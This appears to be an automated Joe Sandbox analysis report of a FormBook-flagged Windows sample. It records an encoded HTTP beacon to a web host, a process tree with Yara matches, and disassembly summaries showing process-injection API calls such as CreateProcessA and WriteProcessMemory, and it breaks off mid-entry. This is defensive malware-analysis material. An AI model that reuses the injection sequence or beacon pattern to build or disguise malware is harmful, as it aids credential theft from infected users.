GET /y54z/?1JgHkl=oqT6mesMFtjVx9Zo+WJYx+2EviEW1FInvVPBS1/+zHYUGg1LXtrFdHCKa7buL2o/Gnc6meWbbP401AFPslg2ZPd0sXm+50uRZ80dRU59tTW2JoKfzEPgRpmu9XiZqkNmHw==&uZ9=wvL0WTq0tnld4P HTTP/1.1
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Accept-Language: en-US
                                                                                                    Host: www.graviton.energy
                                                                                                    Connection: close
                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36

Timestamp:Dec 3, 2024 14:17:50.259577990 CET
Bytes transferred:1236
Direction:IN
Data:
HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Cache-Control: no-cache, private
                                                                                                    Date: Tue, 03 Dec 2024 13:17:50 GMT
                                                                                                    Data Ascii: 970<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml" lang="de" xml:lang="de"><head> <link rel="stylesheet" href="http://www.graviton.energy/css/app.css"> <script type="text/javascript" src="http://www.graviton.energy/js/app.js"></script> <title>Hier entsteht eine neue Website!</title> <meta charset="utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge" /> <meta name="robots" content="noindex"> <meta name="viewport" content="width=device-width, initial-scale=1" /> <link rel="stylesheet" href="https://use.typekit.net/bag0psx.css" /> <meta name="csrf-token" content=""> <link rel="prefetch" as="image" href="http://www.graviton.energy/../images/bg-landing-page.jpg" /> <link rel="apple-touch-icon" sizes="180x180" href="http://www.graviton.energy/images/favicons/apple-touch-icon.png"> <link rel="icon" type="image/png" sizes="32x32" href="http://www.graviton.energy/images/favicons/favicon-32x32.png"> <link rel="icon" type="image/png" [TRUNCATED]

Timestamp:Dec 3, 2024 14:17:50.259618998 CET
Bytes transferred:1236
Direction:IN
Data:
                                                                                                    Data Ascii: graviton.energy/images/favicons/favicon-16x16.png"> <link rel="manifest" href="http://www.graviton.energy/images/favicons/manifest.json"> <link rel="mask-icon" href="http://www.graviton.energy/images/favicons/safari-pinned-tab.svg" col

Timestamp:Dec 3, 2024 14:17:50.259629011 CET
Bytes transferred:148
Direction:IN
Data:
                                                                                                    Data Ascii: -sm"> <div class="copyright"> Copyright 2024, hosttech GmbH </div> </div></footer></div></body></html>0


                                                                                                    Target ID:0
                                                                                                    Start time:08:14:42
                                                                                                    Start date:03/12/2024
                                                                                                    Path:C:\Users\user\Desktop\72STaC6BmljfbIQ.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Users\user\Desktop\72STaC6BmljfbIQ.exe"
                                                                                                    Imagebase:0x3d0000
                                                                                                    File size:765'952 bytes
                                                                                                    MD5 hash:A8058BB3809176BC3EE9E52DF4960F87
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    Target ID:4
                                                                                                    Start time:08:14:58
                                                                                                    Start date:03/12/2024
                                                                                                    Path:C:\Users\user\Desktop\72STaC6BmljfbIQ.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Users\user\Desktop\72STaC6BmljfbIQ.exe"
                                                                                                    Imagebase:0x270000
                                                                                                    File size:765'952 bytes
                                                                                                    MD5 hash:A8058BB3809176BC3EE9E52DF4960F87
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    Target ID:5
                                                                                                    Start time:08:14:58
                                                                                                    Start date:03/12/2024
                                                                                                    Path:C:\Users\user\Desktop\72STaC6BmljfbIQ.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Users\user\Desktop\72STaC6BmljfbIQ.exe"
                                                                                                    Imagebase:0x2e0000
                                                                                                    File size:765'952 bytes
                                                                                                    MD5 hash:A8058BB3809176BC3EE9E52DF4960F87
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    Target ID:6
                                                                                                    Start time:08:14:58
                                                                                                    Start date:03/12/2024
                                                                                                    Path:C:\Users\user\Desktop\72STaC6BmljfbIQ.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Users\user\Desktop\72STaC6BmljfbIQ.exe"
                                                                                                    Imagebase:0x5f0000
                                                                                                    File size:765'952 bytes
                                                                                                    MD5 hash:A8058BB3809176BC3EE9E52DF4960F87
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.1924713892.00000000010C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.1924159868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.1926555511.00000000014A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    Target ID:7
                                                                                                    Start time:08:15:27
                                                                                                    Start date:03/12/2024
                                                                                                    Path:C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe"
                                                                                                    Imagebase:0xc20000
                                                                                                    File size:140'800 bytes
                                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3269604587.00000000023E0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                    Reputation:high
                                                                                                    Has exited:false

                                                                                                    Target ID:8
                                                                                                    Start time:08:15:30
                                                                                                    Start date:03/12/2024
                                                                                                    Path:C:\Windows\SysWOW64\finger.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Windows\SysWOW64\finger.exe"
                                                                                                    Imagebase:0x650000
                                                                                                    File size:13'824 bytes
                                                                                                    MD5 hash:C586D06BF5D5B3E6E9E3289F6AA8225E
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3268946749.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3268484619.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3269214362.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    Reputation:moderate
                                                                                                    Has exited:false

                                                                                                    Target ID:11
                                                                                                    Start time:08:15:43
                                                                                                    Start date:03/12/2024
                                                                                                    Path:C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe"
                                                                                                    Imagebase:0xc20000
                                                                                                    File size:140'800 bytes
                                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3270119796.0000000000820000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                    Reputation:high
                                                                                                    Has exited:false

                                                                                                    Target ID:13
                                                                                                    Start time:08:15:56
                                                                                                    Start date:03/12/2024
                                                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                    Imagebase:0x7ff6d20e0000
                                                                                                    File size:676'768 bytes
                                                                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true


                                                                                                      Execution Graph

                                                                                                      Execution Coverage:10.2%
                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                      Signature Coverage:3.2%
                                                                                                      Total number of Nodes:251
                                                                                                      Total number of Limit Nodes:17
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1550532930.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_5960000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ff3b11e7cb8da0bfe1a73cdc20cff99c704ad8cc2431b6009ff4b5e7ea147fc9
                                                                                                      • Instruction ID: 31ae55791c2fd497631beef50b6c766afd232fc0f603f7ec60009066b8d57cc4
                                                                                                      • Opcode Fuzzy Hash: ff3b11e7cb8da0bfe1a73cdc20cff99c704ad8cc2431b6009ff4b5e7ea147fc9
                                                                                                      • Instruction Fuzzy Hash: 65424070E002188FEB54DFA9C854B9EBBF2FF84300F14856AD44AAB395DB349D45DBA1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1550532930.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_5960000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 74a252d08cdd1c9501f95a373b9f8b15744ffa07584262fe1a8b160cf2373caf
                                                                                                      • Instruction ID: a49d5b5b5f3e81428d7264803d7e3430d22edf78c661cb12a5a300ba1f1b37a4
                                                                                                      • Opcode Fuzzy Hash: 74a252d08cdd1c9501f95a373b9f8b15744ffa07584262fe1a8b160cf2373caf
                                                                                                      • Instruction Fuzzy Hash: 72B12975E002198FDB15CFA5D880B9EBBF2FF84310F18C56AD409AB255EB34E989DB50

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 12 6d56dcd-6d56e6d 14 6d56ea6-6d56ec6 12->14 15 6d56e6f-6d56e79 12->15 22 6d56eff-6d56f2e 14->22 23 6d56ec8-6d56ed2 14->23 15->14 16 6d56e7b-6d56e7d 15->16 17 6d56ea0-6d56ea3 16->17 18 6d56e7f-6d56e89 16->18 17->14 20 6d56e8d-6d56e9c 18->20 21 6d56e8b 18->21 20->20 25 6d56e9e 20->25 21->20 31 6d56f67-6d57021 CreateProcessA 22->31 32 6d56f30-6d56f3a 22->32 23->22 24 6d56ed4-6d56ed6 23->24 26 6d56ef9-6d56efc 24->26 27 6d56ed8-6d56ee2 24->27 25->17 26->22 29 6d56ee4 27->29 30 6d56ee6-6d56ef5 27->30 29->30 30->30 33 6d56ef7 30->33 43 6d57023-6d57029 31->43 44 6d5702a-6d570b0 31->44 32->31 34 6d56f3c-6d56f3e 32->34 33->26 36 6d56f61-6d56f64 34->36 37 6d56f40-6d56f4a 34->37 36->31 38 6d56f4c 37->38 39 6d56f4e-6d56f5d 37->39 38->39 39->39 41 6d56f5f 39->41 41->36 43->44 54 6d570c0-6d570c4 44->54 55 6d570b2-6d570b6 44->55 57 6d570d4-6d570d8 54->57 58 6d570c6-6d570ca 54->58 55->54 56 6d570b8 55->56 56->54 59 6d570e8-6d570ec 57->59 60 6d570da-6d570de 57->60 58->57 61 6d570cc 58->61 63 6d570fe-6d57105 59->63 64 6d570ee-6d570f4 59->64 60->59 62 6d570e0 60->62 61->57 62->59 65 6d57107-6d57116 63->65 66 6d5711c 63->66 64->63 65->66 68 6d5711d 66->68 68->68
                                                                                                      APIs
                                                                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06D5700E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1550994572.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d50000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 963392458-0
                                                                                                      • Opcode ID: 26d0b1f90ad1163c248e1e111efe6a870f5b10180a30945a55db02f2341980ab
                                                                                                      • Instruction ID: ada3da51de9a52e6ca7a83d34b2fc9b4b751f70171e49fb2fbe7e4de186553ff
                                                                                                      • Opcode Fuzzy Hash: 26d0b1f90ad1163c248e1e111efe6a870f5b10180a30945a55db02f2341980ab
                                                                                                      • Instruction Fuzzy Hash: CAA17A71D00259CFEF60CF69CC40BDEBBB2AF48310F15856AE808A7690DB759985CF91

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 69 6d56dd8-6d56e6d 71 6d56ea6-6d56ec6 69->71 72 6d56e6f-6d56e79 69->72 79 6d56eff-6d56f2e 71->79 80 6d56ec8-6d56ed2 71->80 72->71 73 6d56e7b-6d56e7d 72->73 74 6d56ea0-6d56ea3 73->74 75 6d56e7f-6d56e89 73->75 74->71 77 6d56e8d-6d56e9c 75->77 78 6d56e8b 75->78 77->77 82 6d56e9e 77->82 78->77 88 6d56f67-6d57021 CreateProcessA 79->88 89 6d56f30-6d56f3a 79->89 80->79 81 6d56ed4-6d56ed6 80->81 83 6d56ef9-6d56efc 81->83 84 6d56ed8-6d56ee2 81->84 82->74 83->79 86 6d56ee4 84->86 87 6d56ee6-6d56ef5 84->87 86->87 87->87 90 6d56ef7 87->90 100 6d57023-6d57029 88->100 101 6d5702a-6d570b0 88->101 89->88 91 6d56f3c-6d56f3e 89->91 90->83 93 6d56f61-6d56f64 91->93 94 6d56f40-6d56f4a 91->94 93->88 95 6d56f4c 94->95 96 6d56f4e-6d56f5d 94->96 95->96 96->96 98 6d56f5f 96->98 98->93 100->101 111 6d570c0-6d570c4 101->111 112 6d570b2-6d570b6 101->112 114 6d570d4-6d570d8 111->114 115 6d570c6-6d570ca 111->115 112->111 113 6d570b8 112->113 113->111 116 6d570e8-6d570ec 114->116 117 6d570da-6d570de 114->117 115->114 118 6d570cc 115->118 120 6d570fe-6d57105 116->120 121 6d570ee-6d570f4 116->121 117->116 119 6d570e0 117->119 118->114 119->116 122 6d57107-6d57116 120->122 123 6d5711c 120->123 121->120 122->123 125 6d5711d 123->125 125->125
                                                                                                      APIs
                                                                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06D5700E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1550994572.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d50000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 963392458-0
                                                                                                      • Opcode ID: d133a20e857400e364e49a87525e2b9e4e2cf25e77bfed581890b7ba314587e5
                                                                                                      • Instruction ID: 300059c013b8048a19dfefbd095e638d24e1014c2bf4f7652953fc2dc2daeec3
                                                                                                      • Opcode Fuzzy Hash: d133a20e857400e364e49a87525e2b9e4e2cf25e77bfed581890b7ba314587e5
                                                                                                      • Instruction Fuzzy Hash: 5C915971D00259CFEF60CF69CC40B9EBBF2AF48310F1585AAE808A7690DB759985CF91

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 126 4dc0aa8-4dc1d56 128 4dc1d58-4dc1d5e 126->128 129 4dc1d61-4dc1d68 126->129 128->129 130 4dc1d6a-4dc1d70 129->130 131 4dc1d73-4dc1e12 CreateWindowExW 129->131 130->131 133 4dc1e1b-4dc1e53 131->133 134 4dc1e14-4dc1e1a 131->134 138 4dc1e55-4dc1e58 133->138 139 4dc1e60 133->139 134->133 138->139 140 4dc1e61 139->140 140->140
                                                                                                      APIs
                                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04DC1E02
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1549023590.0000000004DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4dc0000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 716092398-0
                                                                                                      • Opcode ID: 3cbcb82ccc02fee776882b6d781f1f755df5da4c764981a9ef1b607b68a8491f
                                                                                                      • Instruction ID: 99aa823fb126f17babcf5617b9cb61351a9aeae6efc18c60b22d61a27938da1c
                                                                                                      • Opcode Fuzzy Hash: 3cbcb82ccc02fee776882b6d781f1f755df5da4c764981a9ef1b607b68a8491f
                                                                                                      • Instruction Fuzzy Hash: 5D51B0B1D00319DFDB14CF9AC984ADEBBB6BF48710F24812EE819AB211D771A845CF90

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 141 4dc1cef-4dc1d56 142 4dc1d58-4dc1d5e 141->142 143 4dc1d61-4dc1d68 141->143 142->143 144 4dc1d6a-4dc1d70 143->144 145 4dc1d73-4dc1dab 143->145 144->145 146 4dc1db3-4dc1e12 CreateWindowExW 145->146 147 4dc1e1b-4dc1e53 146->147 148 4dc1e14-4dc1e1a 146->148 152 4dc1e55-4dc1e58 147->152 153 4dc1e60 147->153 148->147 152->153 154 4dc1e61 153->154 154->154
                                                                                                      APIs
                                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04DC1E02
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1549023590.0000000004DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4dc0000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 716092398-0
                                                                                                      • Opcode ID: c33b1cd874006980d18d64525f9858fbebf1e17aae0591e5118cbdf8d870bae2
                                                                                                      • Instruction ID: bb3f3f35224ab4ee26cf019bea21b71ff9c2af25bd4bc07c50d6a4bf7e0c9469
                                                                                                      • Opcode Fuzzy Hash: c33b1cd874006980d18d64525f9858fbebf1e17aae0591e5118cbdf8d870bae2
                                                                                                      • Instruction Fuzzy Hash: 1941A0B1D00319DFDB14CF9AC884ADEBBB5BF88710F24812EE819AB211D775A945CF90

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 177 4dc0bfc-4dc42fc 180 4dc43ac-4dc43cc call 4dc0ad4 177->180 181 4dc4302-4dc4307 177->181 188 4dc43cf-4dc43dc 180->188 182 4dc4309-4dc4340 181->182 183 4dc435a-4dc4392 CallWindowProcW 181->183 190 4dc4349-4dc4358 182->190 191 4dc4342-4dc4348 182->191 186 4dc439b-4dc43aa 183->186 187 4dc4394-4dc439a 183->187 186->188 187->186 190->188 191->190
                                                                                                      APIs
                                                                                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 04DC4381
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1549023590.0000000004DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4dc0000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CallProcWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 2714655100-0
                                                                                                      • Opcode ID: 86d44073afee3e6b9a856f179be298bb520b0e7731cf7ccaa312bebd857bc920
                                                                                                      • Instruction ID: f99947aff0d07c283668215927985d82e3d5326e445a4908c11e306f17715440
                                                                                                      • Opcode Fuzzy Hash: 86d44073afee3e6b9a856f179be298bb520b0e7731cf7ccaa312bebd857bc920
                                                                                                      • Instruction Fuzzy Hash: 7C4118B590030A9FDB14CF99C888AAABBF5FB88714F24855DD419A7361D774A841CBA0

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 155 27758ed-277596c 156 277596f-27759b9 CreateActCtxA 155->156 158 27759c2-2775a1c 156->158 159 27759bb-27759c1 156->159 166 2775a1e-2775a21 158->166 167 2775a2b-2775a2f 158->167 159->158 166->167 168 2775a31-2775a3d 167->168 169 2775a40-2775a70 167->169 168->169 173 2775a22-2775a27 169->173 174 2775a72-2775af4 169->174 173->167
                                                                                                      APIs
                                                                                                      • CreateActCtxA.KERNEL32(?), ref: 027759A9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1545258609.0000000002770000.00000040.00000800.00020000.00000000.sdmp, Offset: 02770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_2770000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Create
                                                                                                      • String ID:
                                                                                                      • API String ID: 2289755597-0
                                                                                                      • Opcode ID: 8a455d63690ddb26b542ef287c526cd52ccb2a348a0fe92e89b1ef8c083a5ce1
                                                                                                      • Instruction ID: b2dac8b410b3f574673136eea0dc805523bb3f5efa72abcef4e7b080e601abd2
                                                                                                      • Opcode Fuzzy Hash: 8a455d63690ddb26b542ef287c526cd52ccb2a348a0fe92e89b1ef8c083a5ce1
                                                                                                      • Instruction Fuzzy Hash: 3A41B3B1D00719CFEB24DFA9C88479EBBF5BF88704F60816AD408AB251DB756946CF90

                                                                                                      Control-flow Graph

                                                                                                      control_flow_graph 194 27744b4-27759b9 CreateActCtxA 198 27759c2-2775a1c 194->198 199 27759bb-27759c1 194->199 206 2775a1e-2775a21 198->206 207 2775a2b-2775a2f 198->207 199->198 206->207 208 2775a31-2775a3d 207->208 209 2775a40-2775a70 207->209 208->209 213 2775a22-2775a27 209->213 214 2775a72-2775af4 209->214 213->207
                                                                                                      APIs
                                                                                                      • CreateActCtxA.KERNEL32(?), ref: 027759A9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1545258609.0000000002770000.00000040.00000800.00020000.00000000.sdmp, Offset: 02770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_2770000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Create
                                                                                                      • String ID:
                                                                                                      • API String ID: 2289755597-0
                                                                                                      • Opcode ID: 78dccbbcae92c5ea401f61385eb3fc1d27bd75e0be0416db3881586efa9fa8b6
                                                                                                      • Instruction ID: 7f1175e9c6d584933f38214de56e614191e3eaaf46c068ab9eef798586b0d78c
                                                                                                      • Opcode Fuzzy Hash: 78dccbbcae92c5ea401f61385eb3fc1d27bd75e0be0416db3881586efa9fa8b6
                                                                                                      • Instruction Fuzzy Hash: 4E41B2B1D00719CBEB24DFA9C84479EBBF5BF88704F60816AD408AB251DB756945CF90

                                                                                                      Control-flow Graph

                                                                                                      control_flow_graph 217 2775a64-2775a70 218 2775a22-2775a27 217->218 219 2775a72-2775af4 217->219 222 2775a2b-2775a2f 218->222 223 2775a31-2775a3d 222->223 224 2775a40-2775a41 222->224 223->224 224->217
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1545258609.0000000002770000.00000040.00000800.00020000.00000000.sdmp, Offset: 02770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_2770000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e0eebe879825dc605f2e9525d309c22402d718ea0eccba90363d936b75c61ec5
                                                                                                      • Instruction ID: 1fd165fb650cc61333d5474fe5cf8ff598808fc29e418715600704830bdef1a5
                                                                                                      • Opcode Fuzzy Hash: e0eebe879825dc605f2e9525d309c22402d718ea0eccba90363d936b75c61ec5
                                                                                                      • Instruction Fuzzy Hash: C831DCB1804749CFEF01DFA4C8457EEBBF1AF86708F944199C416AB291C779990ACF01

                                                                                                      Control-flow Graph

                                                                                                      control_flow_graph 227 59627c0-59627e5 call 596211c 230 59627e7-59627f7 call 5961e78 227->230 231 59627fa-596288c CreateIconFromResourceEx 227->231 236 5962895-59628b2 231->236 237 596288e-5962894 231->237 237->236
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1550532930.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_5960000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateFromIconResource
                                                                                                      • String ID:
                                                                                                      • API String ID: 3668623891-0
                                                                                                      • Opcode ID: be430c8635334c4017aaa2fd2ee0643314a77074549ddeb12d5a6ba32f1e32a9
                                                                                                      • Instruction ID: aa98ffb0ee776d3cbc6e7a8e92ab2f2adcaf461adcad2a09bd49e76e1ef63159
                                                                                                      • Opcode Fuzzy Hash: be430c8635334c4017aaa2fd2ee0643314a77074549ddeb12d5a6ba32f1e32a9
                                                                                                      • Instruction Fuzzy Hash: C4319A769043499FCB11DFAAC844ADEBFF8EF49210F14805AE954A7261C339A854DFA1

                                                                                                      Control-flow Graph

                                                                                                      control_flow_graph 240 6d56748-6d5679e 242 6d567a0-6d567ac 240->242 243 6d567ae-6d567ed WriteProcessMemory 240->243 242->243 245 6d567f6-6d56826 243->245 246 6d567ef-6d567f5 243->246 246->245
                                                                                                      APIs
                                                                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06D567E0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1550994572.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d50000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MemoryProcessWrite
                                                                                                      • String ID:
                                                                                                      • API String ID: 3559483778-0
                                                                                                      • Opcode ID: 7b0ba723ec4040b22520916501ac6f842b413e95c76c16390cdee03641b9d7fc
                                                                                                      • Instruction ID: 80e4e1b93486c1b4397875915314c9a61a5b55825ef127c1e17a55ad78388bde
                                                                                                      • Opcode Fuzzy Hash: 7b0ba723ec4040b22520916501ac6f842b413e95c76c16390cdee03641b9d7fc
                                                                                                      • Instruction Fuzzy Hash: 622124759003499FDF10DFAAC880BDEBBF5FF88310F10882AE918A7650C7799954CBA4

                                                                                                      Control-flow Graph

                                                                                                      control_flow_graph 250 6d56750-6d5679e 252 6d567a0-6d567ac 250->252 253 6d567ae-6d567ed WriteProcessMemory 250->253 252->253 255 6d567f6-6d56826 253->255 256 6d567ef-6d567f5 253->256 256->255
                                                                                                      APIs
                                                                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06D567E0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1550994572.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d50000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MemoryProcessWrite
                                                                                                      • String ID:
                                                                                                      • API String ID: 3559483778-0
